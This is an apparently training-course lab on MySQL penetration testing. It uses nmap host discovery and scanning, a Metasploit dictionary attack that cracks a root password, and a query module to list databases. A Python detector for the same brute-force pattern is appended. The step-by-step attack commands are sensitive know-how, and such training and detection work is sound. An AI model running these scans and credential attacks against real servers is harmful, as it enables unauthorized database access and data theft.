
Module 09: Database Penetration Testing Methodology - Exercise 1: Pentesting MySQL Database

Written By AKADEMY on Thursday, July 4, 2019 | 10:18 PM

Module 09: Database Penetration Testing Methodology

Objective

The objective of this lab is to extract databases, crack user credentials, manipulate databases and create user accounts using SQL injection techniques.

Scenario

Penetration testers and consultants mimic an attack in the same way an attacker would to gain access to the database, using industry best-practice strategies and their own additional methods, identifying access points and giving guidance on how to lock down your database in the event of a real attack.
A database penetration test will show whether your database is properly designed, configured and maintained, and whether it complies with industry and vendor best practice.
Databases hold important business assets, such as customers' sensitive information, payment card details, product and pricing information, employee records, designs, blueprints, intellectual property and supplier data. Should this information end up in the wrong hands or be compromised in other ways, you may face financial problems in addition to damage to your reputation.

Exercise 1: Pentesting MySQL Database

Scenario

MySQL is one of the most widely used open source databases. It is freely available with unrestricted redistribution, and gives users full access to the source code. The database supports different pluggable storage engines to suit the application.
Because it is so widely used, MySQL is a prime target for attackers seeking access to sensitive information.
As a pentester, you need to be aware of MySQL databases and their related queries.
In this lab, you will learn to perform the following:
i. Obtain information regarding the version of MySQL
ii. Perform dictionary attack on the database server and gain access to it
Lab Duration: 20 Minutes
  1. Click Kali Linux (Internal Network).
    If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
  2. Type root in the Username field and click Next.
  3. Type toor in the Password field and click Sign In.
  4. In this lab, we will scan a subnet for live machines, select one machine, and pentest that machine to gain access to its resources.
    To perform a quick scan, we will do a ping sweep using Nmap. In this lab, we will choose an internal network (Subnet D) for pentesting.
    Launch a command line terminal, type nmap -sP 172.20.20.1-255 and press Enter.
    Within a minute, this displays all the hosts that are up in the network. In this lab, we will choose 172.20.20.11 (Sales Department Subnet D) as our target.
  5. Now, we will perform an intense scan on the Sales Department Subnet D machine. Type nmap -T4 -A 172.20.20.11 and press Enter. This initiates the scan.
  6. Once the scan is completed, you will observe that port 3306 is open, indicating that the MySQL service is running on the remote machine, and that the installed MySQL version is 5.1.61.
  7. In this lab, we will be attempting a dictionary attack on MySQL login credentials using msfconsole.
    To perform this attack, type msfconsole and press Enter to launch the Metasploit Framework Console.
  8. Since we are performing a dictionary attack on the login, we will use the mysql_login scanner. To use it, type use auxiliary/scanner/mysql/mysql_login and press Enter.
  9. Type show options and press Enter to view the options that are to be configured in the module.
  10. Issue the following commands in msfconsole:
    1. set username root
    2. set rhosts 172.20.20.11
    3. set pass_file /root/Wordlists/Passwords.txt
  11. Now, type run and press Enter. The auxiliary module begins the dictionary attack on the database server.
  12. While trying the username 'root' against each password combination, the auxiliary module stops the scan at the combination root/qwerty, which means that the dictionary attack was successful.
  13. Now that we have cracked the user credentials, we will use the mysql_sql auxiliary module to execute MySQL queries, such as listing the databases.
    Type use auxiliary/admin/mysql/mysql_sql and press Enter.
  14. Issue the following commands in msfconsole:
    1. set rhost 172.20.20.11
    2. set username root
    3. set password qwerty
    4. set SQL show databases;
  15. Type run and press Enter.
    The auxiliary module displays all the databases stored on the MySQL server.
  16. This way, you may execute other queries as well to view the information of your choice.
In this lab, you have learned how to:
i. Obtain information regarding the version of MySQL
ii. Perform dictionary attack on the database server and gain access to it
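
What steps 10 to 15 look like from the database server's side, as an added example that is not part of the original lab: a detector that flags a burst of failed logins for one account from one source, and marks the account as compromised when a successful login follows the burst. The log lines are constructed and only modelled on the MySQL general query log; the function name, the threshold of 4 failures and the 60-second window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines modelled on the MySQL general query log (not from the lab).
SAMPLE_LOG = """\
190704 22:18:01 12 Connect Access denied for user 'root'@'172.20.20.9' (using password: YES)
190704 22:18:01 13 Connect Access denied for user 'root'@'172.20.20.9' (using password: YES)
190704 22:18:02 14 Connect Access denied for user 'root'@'172.20.20.9' (using password: YES)
190704 22:18:02 15 Connect Access denied for user 'root'@'172.20.20.9' (using password: YES)
190704 22:18:03 16 Connect root@172.20.20.9 on
190704 22:18:09 16 Query show databases
190704 22:25:40 17 Connect Access denied for user 'app'@'172.20.20.30' (using password: YES)
190704 22:25:55 18 Connect app@172.20.20.30 on sales
"""

DENIED = re.compile(r"^(\d{6} \d\d:\d\d:\d\d)\s+\d+ Connect\s+Access denied for user '([^']*)'@'([^']*)'")
ACCEPT = re.compile(r"^(\d{6} \d\d:\d\d:\d\d)\s+\d+ Connect\s+([^@\s]+)@(\S+) on")

def detect_dictionary_attacks(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return one alert per (user, source) with >= threshold failures inside window."""
    failures = defaultdict(list)   # (user, source) -> timestamps of recent failures
    alerts = {}
    for line in log_text.splitlines():
        denied, accept = DENIED.match(line), ACCEPT.match(line)
        m = denied or accept
        if not m:
            continue               # queries and other events are ignored
        ts = datetime.strptime(m.group(1), "%y%m%d %H:%M:%S")
        key = (m.group(2), m.group(3))
        # Keep only failures that are still inside the sliding window.
        failures[key] = [t for t in failures[key] if ts - t <= window]
        if denied:
            failures[key].append(ts)
            if len(failures[key]) >= threshold:
                alert = alerts.setdefault(key, {"user": key[0], "source": key[1],
                                                "failures": 0, "compromised": False})
                alert["failures"] = max(alert["failures"], len(failures[key]))
        elif key in alerts and failures[key]:
            # Successful login right after a flagged burst: the password was guessed.
            alerts[key]["compromised"] = True
            failures[key].clear()
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_dictionary_attacks(SAMPLE_LOG):
        print(alert)
```

The single failed login by 'app' followed by a success is not flagged, which keeps an ordinary mistyped password from raising an alert.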
